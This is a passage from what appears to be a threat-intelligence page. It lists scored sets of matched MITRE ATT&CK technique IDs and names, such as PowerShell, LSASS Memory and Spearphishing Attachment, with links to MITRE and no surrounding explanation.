- T1583.003 - Virtual Private Server
- T1552.001 - Credentials In Files
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1562.001 - Disable or Modify Tools
- T1203 - Exploitation for Client Execution
- T1570 - Lateral Tool Transfer
- T1070.004 - File Deletion
- T1595.001 - Scanning IP Blocks
- T1588.005 - Exploits
Score: 14.08
Matched TTPs:
- T1053.005 - Scheduled Task
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1218.007 - Msiexec
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1189 - Drive-by Compromise
- T1059.005 - Visual Basic
Score: 47.68
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1113 - Screen Capture
- T1056.001 - Keylogging
- T1539 - Steal Web Session Cookie
- T1547 - Boot or Logon Autostart Execution
- T1566.002 - Spearphishing Link
- T1608.001 - Upload Malware
- T1070.008 - Clear Mailbox Data
- T1112 - Modify Registry
- T1555.003 - Credentials from Web Browsers
- T1070 - Indicator Removal
- T1583.003 - Virtual Private Server
- T1102 - Web Service
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1056 - Input Capture
- T1656 - Impersonation
- T1518.001 - Security Software Discovery
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
Score: 13.29
Matched TTPs:
- T1053.005 - Scheduled Task
- T1033 - System Owner/User Discovery
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1570 - Lateral Tool Transfer
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1021.001 - Remote Desktop Protocol
Score: 11.55
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1547.001 - Registry Run Keys / Startup Folder
- T1078.002 - Domain Accounts
- T1518.001 - Security Software Discovery
Score: 52.24
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1218.011 - Rundll32
- T1114.001 - Local Email Collection
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1080 - Taint Shared Content
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1552.002 - Credentials in Registry
- T1202 - Indirect Command Execution
- T1555.003 - Credentials from Web Browsers
- T1003.001 - LSASS Memory
- T1102 - Web Service
- T1552.001 - Credentials In Files
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1056.002 - GUI Input Capture
- T1039 - Data from Network Shared Drive
- T1027 - Obfuscated Files or Information
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
Score: 45.28
Matched TTPs:
- T1053.005 - Scheduled Task
- T1033 - System Owner/User Discovery
- T1027.009 - Embedded Payloads
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1003.001 - LSASS Memory
- T1589.002 - Email Addresses
- T1583.003 - Virtual Private Server
- T1591 - Gather Victim Org Information
- T1547.001 - Registry Run Keys / Startup Folder
- T1027 - Obfuscated Files or Information
- T1486 - Data Encrypted for Impact
- T1195.002 - Compromise Software Supply Chain
- T1598 - Phishing for Information
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1569.002 - Service Execution
- T1566.003 - Spearphishing via Service
Score: 91.68
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1216.001 - PubPrn
- T1003 - OS Credential Dumping
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1608.004 - Drive-by Target
- T1552.002 - Credentials in Registry
- T1608.001 - Upload Malware
- T1036 - Masquerading
- T1055 - Process Injection
- T1021.002 - SMB/Windows Admin Shares
- T1071.003 - Mail Protocols
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1589.002 - Email Addresses
- T1059 - Command and Scripting Interpreter
- T1102 - Web Service
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1218.010 - Regsvr32
- T1036.003 - Rename Legitimate Utilities
- T1203 - Exploitation for Client Execution
- T1570 - Lateral Tool Transfer
- T1012 - Query Registry
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1569.002 - Service Execution
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
Score: 41.80
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1190 - Exploit Public-Facing Application
- T1021.002 - SMB/Windows Admin Shares
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1546.008 - Accessibility Features
- T1090 - Proxy
- T1059 - Command and Scripting Interpreter
- T1102 - Web Service
- T1552.001 - Credentials In Files
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1039 - Data from Network Shared Drive
- T1078 - Valid Accounts
- T1012 - Query Registry
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1213.005 - Messaging Applications
Score: 32.39
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1003.004 - LSA Secrets
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1040 - Network Sniffing
- T1555 - Credentials from Password Stores
- T1555.003 - Credentials from Web Browsers
- T1003.001 - LSASS Memory
- T1552.001 - Credentials In Files
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1203 - Exploitation for Client Execution
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
Link to MITRE →
Score: 96.22
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1056.001 - Keylogging
- T1025 - Data from Removable Media
- T1003.004 - LSA Secrets
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1497.001 - System Checks
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1007 - System Service Discovery
- T1556.002 - Password Filter DLL
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1195 - Supply Chain Compromise
- T1555 - Credentials from Password Stores
- T1219 - Remote Access Tools
- T1036 - Masquerading
- T1562.004 - Disable or Modify System Firewall
- T1112 - Modify Registry
- T1555.003 - Credentials from Web Browsers
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1059 - Command and Scripting Interpreter
- T1552.001 - Credentials In Files
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1218.001 - Compiled HTML File
- T1078 - Valid Accounts
- T1203 - Exploitation for Client Execution
- T1137.004 - Outlook Home Page
- T1012 - Query Registry
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1555.004 - Windows Credential Manager
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1566.003 - Spearphishing via Service
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
Link to MITRE →
Score: 68.68
Matched TTPs:
- T1053.005 - Scheduled Task
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1548.002 - Bypass User Account Control
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.001 - Spearphishing Attachment
- T1218.007 - Msiexec
- T1106 - Native API
- T1140 - Deobfuscate/Decode Files or Information
- T1055 - Process Injection
- T1480.002 - Mutual Exclusion
- T1562.004 - Disable or Modify System Firewall
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1553.005 - Mark-of-the-Web Bypass
- T1218.005 - Mshta
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1218.001 - Compiled HTML File
- T1562.001 - Disable or Modify Tools
- T1486 - Data Encrypted for Impact
- T1036.003 - Rename Legitimate Utilities
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1569.002 - Service Execution
- T1529 - System Shutdown/Reboot
Link to MITRE →
Score: 42.27
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1056.001 - Keylogging
- T1003.002 - Security Account Manager
- T1003.004 - LSA Secrets
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1106 - Native API
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1036 - Masquerading
- T1090.002 - External Proxy
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1588.002 - Tool
- T1039 - Data from Network Shared Drive
- T1078 - Valid Accounts
- T1036.003 - Rename Legitimate Utilities
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
Link to MITRE →
Score: 8.20
Matched TTPs:
- T1053.005 - Scheduled Task
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1588.002 - Tool
- T1027 - Obfuscated Files or Information
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
Link to MITRE →
Score: 42.54
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1204.002 - Malicious File
- T1213.006 - Databases
- T1566.001 - Spearphishing Attachment
- T1555 - Credentials from Password Stores
- T1555.003 - Credentials from Web Browsers
- T1003.001 - LSASS Memory
- T1059 - Command and Scripting Interpreter
- T1102 - Web Service
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1134 - Access Token Manipulation
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
- T1566.003 - Spearphishing via Service
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
Link to MITRE →
Score: 33.27
Matched TTPs:
- T1053.005 - Scheduled Task
- T1033 - System Owner/User Discovery
- T1539 - Steal Web Session Cookie
- T1587.001 - Malware
- T1566.002 - Spearphishing Link
- T1574.001 - DLL
- T1608.004 - Drive-by Target
- T1091 - Replication Through Removable Media
- T1608.001 - Upload Malware
- T1112 - Modify Registry
- T1588.001 - Malware
- T1608.005 - Link Target
- T1041 - Exfiltration Over C2 Channel
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
Link to MITRE →
Score: 125.34
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1027.009 - Embedded Payloads
- T1056.001 - Keylogging
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1106 - Native API
- T1202 - Indirect Command Execution
- T1140 - Deobfuscate/Decode Files or Information
- T1218 - System Binary Proxy Execution
- T1620 - Reflective Code Loading
- T1547.009 - Shortcut Modification
- T1010 - Application Window Discovery
- T1021.002 - SMB/Windows Admin Shares
- T1562.004 - Disable or Modify System Firewall
- T1134.002 - Create Process with Token
- T1090.002 - External Proxy
- T1589.002 - Email Addresses
- T1070 - Indicator Removal
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1491.001 - Internal Defacement
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1591 - Gather Victim Org Information
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1574.013 - KernelCallbackTable
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1036.003 - Rename Legitimate Utilities
- T1102.002 - Bidirectional Communication
- T1203 - Exploitation for Client Execution
- T1001.003 - Protocol or Service Impersonation
- T1012 - Query Registry
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1027.007 - Dynamic API Resolution
- T1021.001 - Remote Desktop Protocol
- T1566.003 - Spearphishing via Service
- T1090.001 - Internal Proxy
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
- T1529 - System Shutdown/Reboot
Link to MITRE →
Score: 50.49
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1113 - Screen Capture
- T1548.002 - Bypass User Account Control
- T1204.002 - Malicious File
- T1080 - Taint Shared Content
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1007 - System Service Discovery
- T1140 - Deobfuscate/Decode Files or Information
- T1036 - Masquerading
- T1003.001 - LSASS Memory
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1039 - Data from Network Shared Drive
- T1203 - Exploitation for Client Execution
- T1027.003 - Steganography
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
- T1102.001 - Dead Drop Resolver
Link to MITRE →
Score: 34.94
Matched TTPs:
- T1053.005 - Scheduled Task
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1114.001 - Local Email Collection
- T1566.001 - Spearphishing Attachment
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1036 - Masquerading
- T1056.003 - Web Portal Capture
- T1059 - Command and Scripting Interpreter
- T1583.003 - Virtual Private Server
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1584.006 - Web Services
- T1059.003 - Windows Command Shell
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
Link to MITRE →
Score: 59.72
Matched TTPs:
- T1053.005 - Scheduled Task
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1003.002 - Security Account Manager
- T1003.004 - LSA Secrets
- T1204.002 - Malicious File
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.004 - Drive-by Target
- T1190 - Exploit Public-Facing Application
- T1562.004 - Disable or Modify System Firewall
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1059 - Command and Scripting Interpreter
- T1583.003 - Virtual Private Server
- T1598.002 - Spearphishing Attachment
- T1059.001 - PowerShell
- T1071.002 - File Transfer Protocols
- T1210 - Exploitation of Remote Services
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1195.002 - Compromise Software Supply Chain
- T1203 - Exploitation for Client Execution
- T1012 - Query Registry
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
Link to MITRE →
Score: 87.34
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1548.002 - Bypass User Account Control
- T1003.004 - LSA Secrets
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1559.001 - Component Object Model
- T1574.001 - DLL
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1555 - Credentials from Password Stores
- T1219 - Remote Access Tools
- T1218.003 - CMSTP
- T1555.003 - Credentials from Web Browsers
- T1003.001 - LSASS Memory
- T1090.002 - External Proxy
- T1552.001 - Credentials In Files
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1102.002 - Bidirectional Communication
- T1203 - Exploitation for Client Execution
- T1027.003 - Steganography
- T1027.004 - Compile After Delivery
- T1518.001 - Security Software Discovery
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
Link to MITRE →
Score: 104.24
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1025 - Data from Removable Media
- T1204.002 - Malicious File
- T1080 - Taint Shared Content
- T1497.001 - System Checks
- T1566.001 - Spearphishing Attachment
- T1559.001 - Component Object Model
- T1106 - Native API
- T1091 - Replication Through Removable Media
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1055 - Process Injection
- T1620 - Reflective Code Loading
- T1112 - Modify Registry
- T1090 - Proxy
- T1583.003 - Virtual Private Server
- T1102 - Web Service
- T1218.005 - Mshta
- T1027.012 - LNK Icon Smuggling
- T1583.006 - Web Services
- T1491.001 - Internal Defacement
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1102.003 - One-Way Communication
- T1534 - Internal Spearphishing
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1001 - Data Obfuscation
- T1039 - Data from Network Shared Drive
- T1027 - Obfuscated Files or Information
- T1102.002 - Bidirectional Communication
- T1012 - Query Registry
- T1027.004 - Compile After Delivery
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
Link to MITRE →
Score: 136.49
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1113 - Screen Capture
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1539 - Steal Web Session Cookie
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1007 - System Service Discovery
- T1040 - Network Sniffing
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1190 - Exploit Public-Facing Application
- T1055 - Process Injection
- T1620 - Reflective Code Loading
- T1562.004 - Disable or Modify System Firewall
- T1185 - Browser Session Hijacking
- T1071.003 - Mail Protocols
- T1112 - Modify Registry
- T1555.003 - Credentials from Web Browsers
- T1505.003 - Web Shell
- T1583.004 - Server
- T1003.001 - LSASS Memory
- T1589.002 - Email Addresses
- T1552.001 - Credentials In Files
- T1218.005 - Mshta
- T1657 - Financial Theft
- T1027.012 - LNK Icon Smuggling
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1591 - Gather Victim Org Information
- T1059.001 - PowerShell
- T1071.002 - File Transfer Protocols
- T1534 - Internal Spearphishing
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1566 - Phishing
- T1562.001 - Disable or Modify Tools
- T1027 - Obfuscated Files or Information
- T1218.010 - Regsvr32
- T1102.002 - Bidirectional Communication
- T1012 - Query Registry
- T1656 - Impersonation
- T1518.001 - Security Software Discovery
- T1059.006 - Python
- T1598 - Phishing for Information
- T1059.003 - Windows Command Shell
- T1219.002 - Remote Desktop Software
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1588.005 - Exploits
- T1102.001 - Dead Drop Resolver
Link to MITRE →
Score: 22.73
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1555 - Credentials from Password Stores
- T1555.003 - Credentials from Web Browsers
- T1059 - Command and Scripting Interpreter
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1012 - Query Registry
- T1555.004 - Windows Credential Manager
- T1071.001 - Web Protocols
Link to MITRE →
Score: 15.53
Matched TTPs:
- T1053.005 - Scheduled Task
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1608.001 - Upload Malware
- T1588.002 - Tool
- T1573 - Encrypted Channel
- T1203 - Exploitation for Client Execution
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
Link to MITRE →
Score: 17.53
Matched TTPs:
- T1053.005 - Scheduled Task
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1203 - Exploitation for Client Execution
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
Link to MITRE →
Score: 47.61
Matched TTPs:
- T1053.005 - Scheduled Task
- T1033 - System Owner/User Discovery
- T1123 - Audio Capture
- T1548.002 - Bypass User Account Control
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1106 - Native API
- T1055 - Process Injection
- T1555.003 - Credentials from Web Browsers
- T1059 - Command and Scripting Interpreter
- T1057 - Process Discovery
- T1547.001 - Registry Run Keys / Startup Folder
- T1027 - Obfuscated Files or Information
- T1102.002 - Bidirectional Communication
- T1203 - Exploitation for Client Execution
- T1027.003 - Steganography
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1529 - System Shutdown/Reboot
Link to MITRE →
Score: 29.56
Matched TTPs:
- T1560.001 - Archive via Utility
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1583.005 - Botnet
- T1190 - Exploit Public-Facing Application
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1589.002 - Email Addresses
- T1583.003 - Virtual Private Server
- T1584.005 - Botnet
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1059.003 - Windows Command Shell
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
Link to MITRE →
Score: 7.52
Matched TTPs:
- T1560.001 - Archive via Utility
- T1218.011 - Rundll32
- T1090 - Proxy
- T1059.001 - PowerShell
- T1588.002 - Tool
Link to MITRE →
Score: 88.82
Matched TTPs:
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1056.001 - Keylogging
- T1006 - Direct Volume Access
- T1584.008 - Network Devices
- T1497.001 - System Checks
- T1007 - System Service Discovery
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1555 - Credentials from Password Stores
- T1552 - Unsecured Credentials
- T1218 - System Binary Proxy Execution
- T1010 - Application Window Discovery
- T1112 - Modify Registry
- T1555.003 - Credentials from Web Browsers
- T1505.003 - Web Shell
- T1552.004 - Private Keys
- T1003.001 - LSASS Memory
- T1589.002 - Email Addresses
- T1090 - Proxy
- T1584.005 - Botnet
- T1057 - Process Discovery
- T1591 - Gather Victim Org Information
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1587.004 - Exploits
- T1570 - Lateral Tool Transfer
- T1012 - Query Registry
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1090.001 - Internal Proxy
Link to MITRE →
Score: 18.62
Matched TTPs:
- T1560.001 - Archive via Utility
- T1114.001 - Local Email Collection
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1007 - System Service Discovery
- T1003.001 - LSASS Memory
- T1588.001 - Malware
- T1057 - Process Discovery
- T1588.002 - Tool
- T1059.003 - Windows Command Shell
- T1021.001 - Remote Desktop Protocol
Link to MITRE →
Score: 30.77
Matched TTPs:
- T1560.001 - Archive via Utility
- T1587.001 - Malware
- T1190 - Exploit Public-Facing Application
- T1021.002 - SMB/Windows Admin Shares
- T1003.001 - LSASS Memory
- T1657 - Financial Theft
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1048 - Exfiltration Over Alternative Protocol
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1078.002 - Domain Accounts
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1105 - Ingress Tool Transfer
Link to MITRE →
Score: 9.09
Matched TTPs:
- T1560.001 - Archive via Utility
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1059.001 - PowerShell
- T1027 - Obfuscated Files or Information
Link to MITRE →
Score: 34.10
Matched TTPs:
- T1560.001 - Archive via Utility
- T1583.002 - DNS Server
- T1114.001 - Local Email Collection
- T1213.006 - Databases
- T1190 - Exploit Public-Facing Application
- T1564.011 - Ignore Process Interrupts
- T1505.003 - Web Shell
- T1583.003 - Virtual Private Server
- T1588.002 - Tool
- T1566 - Phishing
- T1078 - Valid Accounts
- T1203 - Exploitation for Client Execution
- T1027.004 - Compile After Delivery
- T1071.001 - Web Protocols
Link to MITRE →
Score: 33.47
Matched TTPs:
- T1560.001 - Archive via Utility
- T1056.001 - Keylogging
- T1003.002 - Security Account Manager
- T1583.005 - Botnet
- T1190 - Exploit Public-Facing Application
- T1055 - Process Injection
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1070 - Indicator Removal
- T1057 - Process Discovery
- T1554 - Compromise Host Software Binary
- T1059.001 - PowerShell
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1021.001 - Remote Desktop Protocol
Link to MITRE →
Score: 25.47
Matched TTPs:
- T1560.001 - Archive via Utility
- T1003.002 - Security Account Manager
- T1543.003 - Windows Service
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1036 - Masquerading
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1041 - Exfiltration Over C2 Channel
- T1562.001 - Disable or Modify Tools
- T1570 - Lateral Tool Transfer
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1021.001 - Remote Desktop Protocol
Link to MITRE →
Score: 96.39
Matched TTPs:
- T1560.001 - Archive via Utility
- T1113 - Screen Capture
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1003 - OS Credential Dumping
- T1584.008 - Network Devices
- T1025 - Data from Removable Media
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1040 - Network Sniffing
- T1091 - Replication Through Removable Media
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1036 - Masquerading
- T1021.002 - SMB/Windows Admin Shares
- T1071.003 - Mail Protocols
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1090.002 - External Proxy
- T1583.003 - Virtual Private Server
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1591 - Gather Victim Org Information
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1039 - Data from Network Shared Drive
- T1078 - Valid Accounts
- T1546.015 - Component Object Model Hijacking
- T1589.001 - Credentials
- T1102.002 - Bidirectional Communication
- T1203 - Exploitation for Client Execution
- T1598 - Phishing for Information
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1001.001 - Junk Data
- T1211 - Exploitation for Defense Evasion
Link to MITRE →
Score: 85.52
Matched TTPs:
- T1560.001 - Archive via Utility
- T1546.013 - PowerShell Profile
- T1025 - Data from Removable Media
- T1587.001 - Malware
- T1213.006 - Databases
- T1566.002 - Spearphishing Link
- T1007 - System Service Discovery
- T1106 - Native API
- T1140 - Deobfuscate/Decode Files or Information
